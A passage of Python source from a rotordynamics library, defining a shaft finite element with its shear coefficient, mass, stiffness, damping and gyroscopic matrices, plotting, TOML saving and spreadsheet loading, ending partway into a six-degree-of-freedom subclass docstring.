Shear coefficient for the element.
References
----------
.. bibliography::
:filter: docname in docnames
Examples
--------
>>> from ross.materials import steel
>>> Euler_Bernoulli_Element = ShaftElement(
... material=steel, L=0.5, idl=0.05, odl=0.1,
... idr=0.05, odr=0.15,
... rotary_inertia=False,
... shear_effects=False)
>>> Euler_Bernoulli_Element.phi
0
>>> Timoshenko_Element = ShaftElement(
... material=steel, L=0.5, idl=0.05, odl=0.1,
... rotary_inertia=True,
... shear_effects=True)
>>> Timoshenko_Element.phi
0.1571268472906404
"""
@check_units
def __init__(
self,
L,
idl,
odl,
idr=None,
odr=None,
material=None,
n=None,
axial_force=0,
torque=0,
shear_effects=True,
rotary_inertia=True,
gyroscopic=True,
shear_method_calc="cowper",
tag=None,
):
if idr is None:
idr = idl
if odr is None:
odr = odl
if material is None:
raise AttributeError("Material is not defined.")
if type(material) is str:
self.material = Material.load_material(material)
else:
self.material = material
self.shear_effects = shear_effects
self.rotary_inertia = rotary_inertia
self.gyroscopic = gyroscopic
self.axial_force = axial_force
self.torque = torque
self._n = n
self.n_l = n
self.n_r = None
if n is not None:
self.n_r = n + 1
self.tag = tag
self.shear_method_calc = shear_method_calc
self.L = float(L)
self.o_d = (float(odl) + float(odr)) / 2
self.i_d = (float(idl) + float(idr)) / 2
self.idl = float(idl)
self.odl = float(odl)
self.idr = float(idr)
self.odr = float(odr)
self.color = self.material.color
self.alpha = 0.0
self.beta = 0.0
# A_l = cross section area from the left side of the element
# A_r = cross section area from the right side of the element
A_l = np.pi * (odl ** 2 - idl ** 2) / 4
A_r = np.pi * (odr ** 2 - idr ** 2) / 4
self.A_l = A_l
self.A_r = A_r
# Second moment of area of the cross section from the left side
# of the element
Ie_l = np.pi * (odl ** 4 - idl ** 4) / 64
outer = self.odl ** 2 + self.odl * self.odr + self.odr ** 2
inner = self.idl ** 2 + self.idl * self.idr + self.idr ** 2
self.volume = np.pi * (self.L / 12) * (outer - inner)
self.m = self.material.rho * self.volume
roj = odl / 2
rij = idl / 2
rok = odr / 2
rik = idr / 2
# geometrical coefficients
delta_ro = rok - roj
delta_ri = rik - rij
a1 = 2 * np.pi * (roj * delta_ro - rij * delta_ri) / A_l
a2 = np.pi * (roj ** 3 * delta_ro - rij ** 3 * delta_ri) / Ie_l
b1 = np.pi * (delta_ro ** 2 - delta_ri ** 2) / A_l
b2 = (
3
* np.pi
* (roj ** 2 * delta_ro ** 2 - rij ** 2 * delta_ri ** 2)
/ (2 * Ie_l)
)
gama = np.pi * (roj * delta_ro ** 3 - rij * delta_ri ** 3) / Ie_l
delta = np.pi * (delta_ro ** 4 - delta_ri ** 4) / (4 * Ie_l)
self.a1 = a1
self.a2 = a2
self.b1 = b1
self.b2 = b2
self.gama = gama
self.delta = delta
# the area is calculated from the cross section located in the middle
# of the element
self.A = A_l * (1 + a1 * 0.5 + b1 * 0.5 ** 2)
# Ie is the second moment of area of the cross section - located in
# the middle of the element - about the neutral plane
Ie = Ie_l * (1 + a2 * 0.5 + b2 * 0.5 ** 2 + gama * 0.5 ** 3 + delta * 0.5 ** 4)
self.Ie = Ie
self.Ie_l = Ie_l
phi = 0
# geometric center
c1 = (
roj ** 2
+ 2 * roj * rok
+ 3 * rok ** 2
- rij ** 2
- 2 * rij * rik
- 3 * rik ** 2
)
c2 = (roj ** 2 + roj * rok + rok ** 2) - (rij ** 2 + rij * rik + rik ** 2)
self.beam_cg = L * c1 / (4 * c2)
self.axial_cg_pos = None
# Slenderness ratio of beam elements (G*A*L**2) / (E*I)
sld = (self.material.G_s * self.A * self.L ** 2) / (self.material.E * Ie)
self.slenderness_ratio = sld
# Moment of inertia
# fmt: off
self.Im = (
(np.pi * L * (self.m / self.volume) / 10) *
((roj ** 4 + roj ** 3 * rok + roj ** 2 * rok ** 2 + roj * rok ** 3 + rok ** 4) -
(rij ** 4 + rij ** 3 * rik + rij ** 2 * rik ** 2 + rij * rik ** 3 + rik ** 4))
)
# fmt: on
# picking a method to calculate the shear coefficient
# List of avaible methods:
# hutchinson - kappa as per Hutchinson (2001)
# cowper - kappa as per Cowper (1996)
if shear_effects:
r = ((idl + idr) / 2) / ((odl + odr) / 2)
r2 = r * r
r12 = (1 + r2) ** 2
if shear_method_calc == "hutchinson":
# Shear coefficient (phi)
# kappa as per Hutchinson (2001)
# fmt: off
kappa = 6 * r12 * ((1 + self.material.Poisson) /
((r12 * (7 + 12 * self.material.Poisson + 4 * self.material.Poisson ** 2) +
4 * r2 * (5 + 6 * self.material.Poisson + 2 * self.material.Poisson ** 2))))
# fmt: on
elif shear_method_calc == "cowper":
# kappa as per Cowper (1996)
# fmt: off
kappa = 6 * r12 * (
(1 + self.material.Poisson)
/ (r12 * (7 + 6 * self.material.Poisson) + r2 * (20 + 12 * self.material.Poisson))
)
# fmt: on
else:
raise Warning(
"This method of calculating shear coefficients is not implemented. See guide for futher informations."
)
# fmt: off
phi = 12 * self.material.E * self.Ie / (self.material.G_s * kappa * self.A * L ** 2)
# fmt: on
self.kappa = kappa
self.phi = phi
self.dof_global_index = None
def __eq__(self, other):
"""Equality method for comparasions.
Parameters
----------
other : obj
parameter for comparasion
Returns
-------
bool
True if the comparison is true; False otherwise.
Example
-------
>>> from ross.materials import steel
>>> shaft1 = ShaftElement(
... L=0.25, idl=0, idr=0, odl=0.05, odr=0.08,
... material=steel, rotary_inertia=True, shear_effects=True
... )
>>> shaft2 = ShaftElement(
... L=0.25, idl=0, idr=0, odl=0.05, odr=0.08,
... material=steel, rotary_inertia=True, shear_effects=True
... )
>>> shaft1 == shaft2
True
"""
if self.__dict__ == other.__dict__:
return True
else:
return False
def __repr__(self):
"""Return a string representation of a shaft element.
Returns
-------
A string representation of a shaft element object.
Examples
--------
>>> from ross.materials import steel
>>> shaft1 = ShaftElement(
... L=0.25, idl=0, idr=0, odl=0.05, odr=0.08,
... material=steel, rotary_inertia=True, shear_effects=True
... )
>>> shaft1 # doctest: +ELLIPSIS
ShaftElement(L=0.25, idl=0.0...
"""
return (
f"{self.__class__.__name__}"
f"(L={self.L:{0}.{5}}, idl={self.idl:{0}.{5}}, "
f"idr={self.idr:{0}.{5}}, odl={self.odl:{0}.{5}}, "
f"odr={self.odr:{0}.{5}}, material={self.material.name!r}, "
f"n={self.n})"
)
def __str__(self):
"""Convert object into string.
Returns
-------
The object's parameters translated to strings
Example
-------
>>> print(ShaftElement(L=0.25, idl=0, odl=0.05, odr=0.08, material=steel))
Element Number: None
Element Lenght (m): 0.25
Left Int. Diam. (m): 0.0
Left Out. Diam. (m): 0.05
Right Int. Diam. (m): 0.0
Right Out. Diam. (m): 0.08
-----------------------------------
Steel
-----------------------------------
Density (kg/m**3): 7810.0
Young`s modulus (N/m**2): 2.11e+11
Shear modulus (N/m**2): 8.12e+10
Poisson coefficient : 0.29926108
"""
return (
f"Element Number: {self.n}"
f"\nElement Lenght (m): {self.L:{10}.{5}}"
f"\nLeft Int. Diam. (m): {self.idl:{10}.{5}}"
f"\nLeft Out. Diam. (m): {self.odl:{10}.{5}}"
f"\nRight Int. Diam. (m): {self.idr:{10}.{5}}"
f"\nRight Out. Diam. (m): {self.odr:{10}.{5}}"
f'\n{35*"-"}'
f"\n{self.material}"
)
def __hash__(self):
return hash(self.tag)
def save(self, file):
signature = inspect.signature(self.__init__)
args_list = list(signature.parameters)
args = {arg: getattr(self, arg) for arg in args_list}
# add material characteristics so that the shaft element can be reconstructed
# even if the material is not in the available_materials file.
args["material"] = {
"name": self.material.name,
"rho": self.material.rho,
"E": self.material.E,
"G_s": self.material.G_s,
"color": self.material.color,
}
try:
data = toml.load(file)
except FileNotFoundError:
data = {}
data[f"{self.__class__.__name__}_{self.tag}"] = args
with open(file, "w") as f:
toml.dump(data, f)
@classmethod
def read_toml_data(cls, data):
data["material"] = Material(**data["material"])
return cls(**data)
@property
def n(self):
"""Set the element number as property.
Returns
-------
n : int
Element number
"""
return self._n
@n.setter
def n(self, value):
"""Set a new value for the element number.
Parameters
----------
value : int
element number
Example
-------
>>> from ross.materials import steel
>>> shaft1 = ShaftElement(
... L=0.25, idl=0, idr=0, odl=0.05, odr=0.08,
... material=steel, rotary_inertia=True, shear_effects=True
... )
>>> shaft1.n = 0
>>> shaft1 # doctest: +ELLIPSIS
ShaftElement(L=0.25, idl=0.0...
"""
self._n = value
self.n_l = value
if value is not None:
self.n_r = value + 1
def dof_mapping(self):
"""Degrees of freedom mapping.
Returns a dictionary with a mapping between degree of freedom and its index.
Returns
-------
dof_mapping : dict
A dictionary containing the degrees of freedom and their indexes.
Examples
--------
The numbering of the degrees of freedom for each node.
Being the following their ordering for a node:
x_0 - horizontal translation
y_0 - vertical translation
z_0 - axial translation
alpha_0 - rotation around horizontal
beta_0 - rotation around vertical
theta_0 - torsion around axial
>>> sh = ShaftElement(L=0.5, idl=0.05, odl=0.1, material=steel,
... rotary_inertia=True, shear_effects=True)
>>> sh.dof_mapping()["x_0"]
0
"""
return dict(
x_0=0, y_0=1, alpha_0=2, beta_0=3, x_1=4, y_1=5, alpha_1=6, beta_1=7
)
def M(self):
"""Mass matrix for an instance of a shaft element.
Returns
-------
M : np.ndarray
Mass matrix for the shaft element.
Examples
--------
>>> Timoshenko_Element = ShaftElement(
... L=0.5, idl=0.05, idr=0.05, odl=0.1,
... odr=0.15, material=steel,
... rotary_inertia=True,
... shear_effects=True)
>>> Timoshenko_Element.M()[:4, :4]
array([[11.36986417, 0. , 0. , 0.86197637],
[ 0. , 11.36986417, -0.86197637, 0. ],
[ 0. , -0.86197637, 0.08667495, 0. ],
[ 0.86197637, 0. , 0. , 0.08667495]])
"""
phi = self.phi
L = self.L
a1 = self.a1
a2 = self.a2
b1 = self.b1
b2 = self.b2
delta = self.delta
gama = self.gama
Ie_l = self.Ie_l
A_l = self.A_l
m1 = (
(468 + 882 * phi + 420 * phi ** 2)
+ a1 * (108 + 210 * phi + 105 * phi ** 2)
+ b1 * (38 + 78 * phi + 42 * phi ** 2)
)
m2 = (
(66 + 115.5 * phi + 52.5 * phi ** 2)
+ a1 * (21 + 40.5 * phi + 21 * phi ** 2)
+ b1 * (8.5 + 18 * phi + 10.5 * phi ** 2)
)
m3 = (
(162 + 378 * phi + 210 * phi ** 2)
+ a1 * (81 + 189 * phi + 105 * phi ** 2)
+ b1 * (46 + 111 * phi + 63 * phi ** 2)
)
m4 = (
(39 + 94.5 * phi + 52.5 * phi ** 2)
+ a1 * (18 + 40.5 * phi + 21 * phi ** 2)
+ b1 * (9.5 + 21 * phi + 10.5 * phi ** 2)
)
m5 = (
(12 + 21 * phi + 10.5 * phi ** 2)
+ a1 * (4.5 + 9 * phi + 5.25 * phi ** 2)
+ b1 * (2 + 4.5 * phi + 3 * phi ** 2)
)
m6 = (
(39 + 94.5 * phi + 52.5 * phi ** 2)
+ a1 * (21 + 54 * phi + 31.5 * phi ** 2)
+ b1 * (12.5 + 34.5 * phi + 21 * phi ** 2)
)
m7 = (
(9 + 21 * phi + 10.5 * phi ** 2)
+ a1 * (4.5 + 10.5 * phi + 5.25 * phi ** 2)
+ b1 * (2.5 + 6 * phi + 3 * phi ** 2)
)
m8 = (
(468 + 882 * phi + 420 * phi ** 2)
+ a1 * (360 + 672 * phi + 315 * phi ** 2)
+ b1 * (290 + 540 * phi + 252 * phi ** 2)
)
m9 = (
(66 + 115.5 * phi + 52.5 * phi ** 2)
+ a1 * (45 + 75 * phi + 31.5 * phi ** 2)
+ b1 * (32.5 + 52.5 * phi + 21 * phi ** 2)
)
m10 = (
(12 + 21 * phi + 10.5 * phi ** 2)
+ a1 * (7.5 + 12 * phi + 5.25 * phi ** 2)
+ b1 * (5 + 7.5 * phi + 3 * phi ** 2)
)
# fmt: off
Mt = np.array([
[ m1, 0, 0, L*m2, m3, 0, 0, -L*m4],
[ 0, m1, -L*m2, 0, 0, m3, L*m4, 0],
[ 0, -L*m2, L**2*m5, 0, 0, -L*m6, -L**2*m7, 0],
[ L*m2, 0, 0, L**2*m5, L*m6, 0, 0, -L**2*m7],
[ m3, 0, 0, L*m6, m8, 0, 0, -L*m9],
[ 0, m3, -L*m6, 0, 0, m8, L*m9, 0],
[ 0, L*m4, -L**2*m7, 0, 0, L*m9, L**2*m10, 0],
[-L*m4, 0, 0, -L**2*m7, -L*m9, 0, 0, L**2*m10],
])
# fmt: on
M = self.material.rho * A_l * L * Mt / (1260 * (1 + phi) ** 2)
if self.rotary_inertia:
# fmt: off
m11 = 252 + 126 * a2 + 72 * b2 + 45 * gama + 30 * delta
m12 = (
21 - 105 * phi
+ a2 * (21 - 42 * phi)
+ b2 * (15 - 21 * phi)
+ gama * (10.5 - 12 * phi)
+ delta * (7.5 - 7.5 * phi)
)
m13 = (
21 - 105 * phi
- 63 * a2 * phi
- b2 * (6 + 42 * phi)
- gama * (7.5 + 30 * phi)
- delta * (7.5 + 22.5 * phi)
)
m14 = (
28 + 35 * phi + 70 * phi ** 2
+ a2 * (7 - 7 * phi + 17.5 * phi ** 2)
+ b2 * (4 - 7 * phi + 7 * phi ** 2)
+ gama * (2.75 - 5 * phi + 3.5 * phi ** 2)
+ delta * (2 - 3.5 * phi + 2 * phi ** 2)
)
m15 = (
7 + 35 * phi - 35 * phi ** 2
+ a2 * (3.5 + 17.5 * phi - 17.5 * phi ** 2)
+ b2 * (3 + 10.5 * phi - 10.5 * phi ** 2)
+ gama * (2.75 + 7 * phi - 7 * phi ** 2)
+ delta * (2.5 + 5 * phi - 5 * phi ** 2)
)
m16 = (
28 + 35 * phi + 70 * phi ** 2
+ a2 * (21 + 42 * phi + 52.5 * phi ** 2)
+ b2 * (18 + 42 * phi + 42 * phi ** 2)
+ gama * (16.25 + 40 * phi + 35 * phi ** 2)
+ delta * (15 + 37.5 * phi + 30 * phi ** 2)
)
Mr = np.array([
[ m11, 0, 0, L*m12, -m11, 0, 0, L*m13],
[ 0, m11, -L*m12, 0, 0, -m11, -L*m13, 0],
[ 0, -L*m12, L**2*m14, 0, 0, L*m12, -L**2*m15, 0],
[L*m12, 0, 0, L**2*m14, -L*m12, 0, 0, -L**2*m15],
[ -m11, 0, 0, -L*m12, m11, 0, 0, -L*m13],
[ 0, -m11, L*m12, 0, 0, m11, L*m13, 0],
[ 0, -L*m13, -L**2*m15, 0, 0, L*m13, L**2*m16, 0],
[L*m13, 0, 0, -L**2*m15, -L*m13, 0, 0, L**2*m16],
])
# fmt: on
Mr = self.material.rho * Ie_l * Mr / (210 * L * (1 + phi) ** 2)
M = M + Mr
return M
def K(self):
"""Stiffness matrix for an instance of a shaft element.
Returns
-------
K : np.ndarray
Stiffness matrix for the shaft element.
Examples
--------
>>> from ross.materials import steel
>>> Timoshenko_Element = ShaftElement(
... L=0.5, idl=0.05, idr=0.05, odl=0.1,
... odr=0.15, material=steel,
... rotary_inertia=True,
... shear_effects=True)
>>> Timoshenko_Element.K()[:4, :4]/1e6
array([[209.25641985, 0. , 0. , 38.62129051],
[ 0. , 209.25641985, -38.62129051, 0. ],
[ 0. , -38.62129051, 11.56619973, 0. ],
[ 38.62129051, 0. , 0. , 11.56619973]])
"""
L = self.L
phi = self.phi
a1 = self.a1
a2 = self.a2
b1 = self.b1
b2 = self.b2
delta = self.delta
gama = self.gama
Ie_l = self.Ie_l
# fmt: off
k1 = 1260 + 630 * a2 + 504 * b2 + 441 * gama + 396 * delta
k2 = (
630
+ 210 * a2
+ 147 * b2
+ 126 * gama
+ 114 * delta
- phi * (105 * a2 + 105 * b2 + 94.5 * gama + 84 * delta)
)
k3 = (
630
+ 420 * a2
+ 357 * b2
+ 315 * gama
+ 282 * delta
+ phi * (105 * a2 + 105 * b2 + 94.5 * gama + 84 * delta)
)
k4 = (
420 + 210 * phi + 105 * phi ** 2
+ a2 * (105 + 52.5 * phi ** 2)
+ b2 * (56 - 35 * phi + 35 * phi ** 2)
+ gama * (42 - 42 * phi + 26.25 * phi ** 2)
+ delta * (36 - 42 * phi + 21 * phi ** 2)
)
k5 = (
210 - 210 * phi - 105 * phi ** 2
+ a2 * (105 - 105 * phi - 52.5 * phi ** 2)
+ b2 * (91 - 70 * phi - 35 * phi ** 2)
+ gama * (84 - 52.5 * phi - 26.25 * phi ** 2)
+ delta * (78 - 42 * phi - 21 * phi ** 2)
)
k6 = (
420 + 210 * phi + 105 * phi ** 2
+ a2 * (315 + 210 * phi + 52.5 * phi ** 2)
+ b2 * (266 + 175 * phi + 35 * phi ** 2)
+ gama * (231 + 147 * phi + 26.25 * phi ** 2)
+ delta * (204 + 126 * phi + 21 * phi ** 2)
)
k7 = 12 + 6 * a1 + 4 * b1
k8 = 6 + 3 * a1 + 2 * b1
k9 = 3 + 1.5 * a1 + b1
K1 = np.array([
[ k1, 0, 0, L*k2, -k1, 0, 0, L*k3],
[ 0, k1, -L*k2, 0, 0, -k1, -L*k3, 0],
[ 0, -L*k2, L**2*k4, 0, 0, L*k2, L**2*k5, 0],
[L*k2, 0, 0, L**2*k4, -L*k2, 0, 0, L**2*k5],
[ -k1, 0, 0, -L*k2, k1, 0, 0, -L*k3],
[ 0, -k1, L*k2, 0, 0, k1, L*k3, 0],
[ 0, -L*k3, L**2*k5, 0, 0, L*k3, L**2*k6, 0],
[L*k3, 0, 0, L**2*k5, -L*k3, 0, 0, L**2*k6],
])
K2 = np.array([
[ k7, 0, 0, L*k8, -k7, 0, 0, L*k8],
[ 0, k7, -L*k8, 0, 0, -k7, -L*k8, 0],
[ 0, -L*k8, L**2*k9, 0, 0, L*k8, L**2*k9, 0],
[L*k8, 0, 0, L**2*k9, -L*k8, 0, 0, L**2*k9],
[ -k7, 0, 0, -L*k8, k7, 0, 0, -L*k8],
[ 0, -k7, L*k8, 0, 0, k7, L*k8, 0],
[ 0, -L*k8, L**2*k9, 0, 0, L*k8, L**2*k9, 0],
[L*k8, 0, 0, L**2*k9, -L*k8, 0, 0, L**2*k9],
])
K = self.material.E * Ie_l / (105 * L ** 3 * (1 + phi) ** 2) * (K1 + 105 * phi * K2)
# fmt: on
return K
def C(self):
"""Stiffness matrix for an instance of a shaft element.
Returns
-------
C : np.array
Damping matrix for the shaft element.
Examples
--------
>>> from ross.materials import steel
>>> Timoshenko_Element = ShaftElement(
... L=0.5, idl=0.05, idr=0.05, odl=0.1,
... odr=0.15, material=steel,
... rotary_inertia=True,
... shear_effects=True)
>>> Timoshenko_Element.C()[:4, :4]
array([[0., 0., 0., 0.],
[0., 0., 0., 0.],
[0., 0., 0., 0.],
[0., 0., 0., 0.]])
"""
C = np.zeros((8, 8))
return C
def G(self):
"""Gyroscopic matrix for an instance of a shaft element.
Returns
-------
G : np.ndarray
Gyroscopic matrix for the shaft element.
Examples
--------
>>> from ross.materials import steel
>>> # Timoshenko is the default shaft element
>>> Timoshenko_Element = ShaftElement(
... L=0.5, idl=0.05, idr=0.05, odl=0.1,
... odr=0.15, material=steel,
... rotary_inertia=True,
... shear_effects=True)
>>> Timoshenko_Element.G()[:4, :4]
array([[ 0. , 0.30940809, -0.01085902, 0. ],
[-0.30940809, 0. , 0. , -0.01085902],
[ 0.01085902, 0. , 0. , 0.0067206 ],
[ 0. , 0.01085902, -0.0067206 , 0. ]])
"""
if self.gyroscopic:
phi = self.phi
L = self.L
a2 = self.a2
b2 = self.b2
delta = self.delta
gama = self.gama
Ie_l = self.Ie_l
# fmt: off
g1 = 252 + 126 * a2 + 72 * b2 + 45 * gama + 30 * delta
g2 = (
21 - 105 * phi
+ a2 * (21 - 42 * phi)
+ b2 * (15 - 21 * phi)
+ gama * (10.5 - 12 * phi)
+ delta * (7.5 - 7.5 * phi)
)
g3 = (
21 - 105 * phi
- 63 * a2 * phi
- b2 * (6 + 42 * phi)
- gama * (7.5 + 30 * phi)
- delta * (7.5 + 22.5 * phi)
)
g4 = (
28 + 35 * phi + 70 * phi ** 2
+ a2 * (7 - 7 * phi + 17.5 * phi ** 2)
+ b2 * (4 - 7 * phi + 7 * phi ** 2)
+ gama * (2.75 - 5 * phi + 3.5 * phi ** 2)
+ delta * (2 - 3.5 * phi + 2 * phi ** 2)
)
g5 = (
7 + 35 * phi - 35 * phi ** 2
+ a2 * (3.5 + 17.5 * phi - 17.5 * phi ** 2)
+ b2 * (3 + 10.5 * phi - 10.5 * phi ** 2)
+ gama * (2.75 + 7 * phi - 7 * phi ** 2)
+ delta * (2.5 + 5 * phi - 5 * phi ** 2)
)
g6 = (
28 + 35 * phi + 70 * phi ** 2
+ a2 * (21 + 42 * phi + 52.5 * phi ** 2)
+ b2 * (18 + 42 * phi + 42 * phi ** 2)
+ gama * (16.25 + 40 * phi + 35 * phi ** 2)
+ delta * (15 + 37.5 * phi + 30 * phi ** 2)
)
G = np.array([
[ 0, g1, -L*g2, 0, 0, -g1, -L*g3, 0],
[ -g1, 0, 0, -L*g2, g1, 0, 0, -L*g3],
[L*g2, 0, 0, L**2*g4, -L*g2, 0, 0, -L**2*g5],
[ 0, L*g2, -L**2*g4, 0, 0, -L*g2, L**2*g5, 0],
[ 0, -g1, L*g2, 0, 0, g1, L*g3, 0],
[ g1, 0, 0, L*g2, -g1, 0, 0, L*g3],
[L*g3, 0, 0, -L**2*g5, -L*g3, 0, 0, L**2*g6],
[ 0, L*g3, L**2*g5, 0, 0, -L*g3, -L**2*g6, 0],
])
# fmt: on
G = self.material.rho * Ie_l * 2 * G / (210 * L * (1 + phi) ** 2)
else:
G = np.zeros((8, 8))
return G
def _patch(self, position, check_sld, fig, units):
"""Shaft element patch.
Patch that will be used to draw the shaft element using Plotly library.
Parameters
----------
position : float
Position in which the patch will be drawn.
check_sld : bool
If True, HoverTool displays only the slenderness ratio and color
the elements in yellow if slenderness ratio < 1.6
fig : plotly.graph_objects.Figure
The figure object which traces are added on.
units : str, optional
Element length and radius units.
Default is 'm'.
Returns
-------
fig : plotly.graph_objects.Figure
The figure object which traces are added on.
"""
if check_sld is True and self.slenderness_ratio < 1.6:
color = "yellow"
legend = "Shaft - Slenderness Ratio < 1.6"
else:
color = self.material.color
legend = "Shaft"
# plot the shaft
z_upper = [position, position, position + self.L, position + self.L, position]
y_upper = [self.idl / 2, self.odl / 2, self.odr / 2, self.idr / 2, self.idl / 2]
z_lower = [position, position, position + self.L, position + self.L, position]
y_lower = [
-self.idl / 2,
-self.odl / 2,
-self.odr / 2,
-self.idr / 2,
-self.idl / 2,
]
z_pos = z_upper
z_pos.extend(z_lower)
y_pos = y_upper
y_pos.extend(y_lower)
if check_sld:
customdata = [self.n, self.slenderness_ratio]
hovertemplate = (
f"Element Number: {customdata[0]}<br>"
+ f"Slenderness Ratio: {customdata[1]:.3f}"
)
else:
if isinstance(self, ShaftElement6DoF):
customdata = [
self.n,
Q_(self.odl, "m").to(units).m,
Q_(self.idl, "m").to(units).m,
Q_(self.odr, "m").to(units).m,
Q_(self.idr, "m").to(units).m,
self.alpha,
self.beta,
Q_(self.L, "m").to(units).m,
self.material.name,
]
hovertemplate = (
f"Element Number: {customdata[0]}<br>"
+ f"Left Outer Diameter: {round(customdata[1], 6)} {units}<br>"
+ f"Left Inner Diameter: {round(customdata[2], 6)} {units}<br>"
+ f"Right Outer Diameter: {round(customdata[3], 6)} {units}<br>"
+ f"Right Inner Diameter: {round(customdata[4], 6)} {units}<br>"
+ f"Alpha Damp. Factor: {round(customdata[5], 6)}<br>"
+ f"Beta Damp. Factor: {round(customdata[6], 6)}<br>"
+ f"Element Length: {round(customdata[7], 6)} {units} <br>"
+ f"Material: {customdata[8]}<br>"
)
else:
customdata = [
self.n,
Q_(self.odl, "m").to(units).m,
Q_(self.idl, "m").to(units).m,
Q_(self.odr, "m").to(units).m,
Q_(self.idr, "m").to(units).m,
Q_(self.L, "m").to(units).m,
self.material.name,
]
hovertemplate = (
f"Element Number: {customdata[0]}<br>"
+ f"Left Outer Diameter: {round(customdata[1], 6)} {units}<br>"
+ f"Left Inner Diameter: {round(customdata[2], 6)} {units}<br>"
+ f"Right Outer Diameter: {round(customdata[3], 6)} {units}<br>"
+ f"Right Inner Diameter: {round(customdata[4], 6)} {units}<br>"
+ f"Element Length: {round(customdata[5], 6)} {units}<br>"
+ f"Material: {customdata[6]}<br>"
)
fig.add_trace(
go.Scatter(
x=Q_(z_pos, "m").to(units).m,
y=Q_(y_pos, "m").to(units).m,
customdata=[customdata] * len(z_pos),
text=hovertemplate,
mode="lines",
opacity=0.5,
fill="toself",
fillcolor=color,
line=dict(width=1.5, color="black"),
showlegend=False,
name=self.tag,
legendgroup=legend,
hoveron="points+fills",
hoverinfo="text",
hovertemplate=hovertemplate,
hoverlabel=dict(bgcolor=color),
)
)
return fig
@classmethod
def from_table(cls, file, sheet_type="Simple", sheet_name=0):
"""Instantiate one or more shafts using inputs from an Excel table.
A header with the names of the columns is required. These names should
match the names expected by the routine (usually the names of the
parameters, but also similar ones). The program will read every row
bellow the header until they end or it reaches a NaN.
Parameters
----------
file : str
Path to the file containing the shaft parameters.
sheet_type : str, optional
Describes the kind of sheet the function should expect:
Simple: The input table should specify only the number of the materials
to be used.
They must be saved prior to calling the method.
Model: The materials parameters must be passed along with the shaft
parameters. Each material must have an id number and each shaft must
reference one of the materials ids.
sheet_name : int or str, optional
Position of the sheet in the file (starting from 0) or its name. If none is
passed, it is assumed to be the first sheet in the file.
Returns
-------
shaft : list
A list of shaft objects.
"""
parameters = read_table_file(
file, "shaft", sheet_name=sheet_name, sheet_type=sheet_type
)
list_of_shafts = []
if sheet_type == "Model":
new_materials = {}
for i in range(0, len(parameters["matno"])):
new_material = Material(
name="shaft_mat_" + str(parameters["matno"][i]),
rho=parameters["rhoa"][i],
E=parameters["ea"][i],
G_s=parameters["ga"][i],
color=parameters["color"][i],
)
new_materials["shaft_mat_" + str(parameters["matno"][i])] = new_material
for i in range(0, len(parameters["L"])):
list_of_shafts.append(
cls(
L=parameters["L"][i],
idl=parameters["idl"][i],
odl=parameters["odl"][i],
idr=parameters["idr"][i],
odr=parameters["odr"][i],
material=new_materials[parameters["material"][i]],
n=parameters["n"][i],
axial_force=parameters["axial_force"][i],
torque=parameters["torque"][i],
shear_effects=parameters["shear_effects"][i],
rotary_inertia=parameters["rotary_inertia"][i],
gyroscopic=parameters["gyroscopic"][i],
shear_method_calc=parameters["shear_method_calc"][i],
)
)
elif sheet_type == "Simple":
for i in range(0, len(parameters["L"])):
list_of_shafts.append(
cls(
L=parameters["L"][i],
idl=parameters["idl"][i],
odl=parameters["odl"][i],
idr=parameters["idr"][i],
odr=parameters["odr"][i],
material=parameters["material"][i],
n=parameters["n"][i],
axial_force=parameters["axial_force"][i],
torque=parameters["torque"][i],
shear_effects=parameters["shear_effects"][i],
rotary_inertia=parameters["rotary_inertia"][i],
gyroscopic=parameters["gyroscopic"][i],
shear_method_calc=parameters["shear_method_calc"][i],
)
)
return list_of_shafts
@classmethod
def section(
cls,
L,
ne,
s_idl,
s_odl,
s_idr=None,
s_odr=None,
material=None,
n=None,
shear_effects=True,
rotary_inertia=True,
gyroscopic=True,
):
"""Shaft section constructor.
This method will create a shaft section with length 'L' divided into
'ne' elements.
Parameters
----------
i_d : float
Inner diameter of the section.
o_d : float
Outer diameter of the section.
E : float
Young's modulus.
G_s : float
Shear modulus.
material : ross.material
Shaft material.
n : int, optional
Element number (coincident with it's first node).
If not given, it will be set when the rotor is assembled
according to the element's position in the list supplied to
the rotor constructor.
axial_force : float
Axial force.
torque : float
Torque.
shear_effects : bool
Determine if shear effects are taken into account.
Default is False.
rotary_inertia : bool
Determine if rotary_inertia effects are taken into account.
Default is False.
gyroscopic : bool
Determine if gyroscopic effects are taken into account.
Default is False.
Returns
-------
elements : list
List with the 'ne' shaft elements.
Examples
--------
>>> # shaft material
>>> from ross.materials import steel
>>> # shaft inner and outer diameters
>>> s_idl = 0
>>> s_odl = 0.01585
>>> sec = ShaftElement.section(247.65e-3, 4, 0, 15.8e-3, material=steel)
>>> len(sec)
4
>>> sec[0].i_d
0.0
"""
if s_idr is None:
s_idr = s_idl
if s_odr is None:
s_odr = s_odl
le = L / ne
elements = [
cls(
le,
(s_idr - s_idl) * i * le / L + s_idl,
(s_odr - s_odl) * i * le / L + s_odl,
(s_idr - s_idl) * (i + 1) * le / L + s_idl,
(s_odr - s_odl) * (i + 1) * le / L + s_odl,
material,
n,
shear_effects,
rotary_inertia,
gyroscopic,
)
for i in range(ne)
]
return elements
class ShaftElement6DoF(ShaftElement):
r"""A 6 Degrees of Freedom shaft element.
This class will create a shaft element that takes into
account shear stress, rotary inertia and gyroscopic effects.
The matrices will be defined considering the following local
coordinate vector:
.. math::
[u_0, v_0, w_0, \theta_0, \psi_0, \phi_0, u_1, v_1, w_1, \theta_1, \psi_1, \phi_1]^T
Being the following their ordering for an element:
:math:`x_0,u_0` - horizontal translation;
:math:`y_0,v_0` - vertical translation;
:math:`z_0,w_0` - axial translation;
:math:`\theta_0` - rotation around horizontal, bending on the yz plane;
:math:`\psi_0` - rotation around vertical, bending on the xz plane;
:math:`\phi_0` - torsion around axial, z direction.
Parameters
----------
L : float, pint.Quantity
Element length.
idl : float, pint.Quantity
Inner diameter of the element at the left node (m).
odl : float, pint.Quantity
Outer diameter of the element at the left node (m).
idr : float, pint.Quantity, optional
Inner diameter of the element at the right node (m).
Default is equal to idl value for cylindrical element.
odr : float, pint.Quantity, optional
Outer diameter of the element at the right node (m).
Default is equal to odl value for cylindrical element.
material : ross.Material
Shaft material.
alpha : float, optional
Proportional damping coefficient, associated to the element Mass matrix
beta : float, optional
Proportional damping coefficient, associated to the element Stiffness matrix
n : int, optional
Element number, coincident it's first node.
If not given, it will be set when the rotor is assembled
according to the element's position in the list supplied to
the rotor constructor.
axial_force : float, optional
Axial force (N).
Default is zero.
torque : float, optional
Torque moment (N*m).
Default is zero.
shear_effects : bool, optional
Determine if shear effects are taken into account;
Default is True.
rotary_inertia : bool, optional
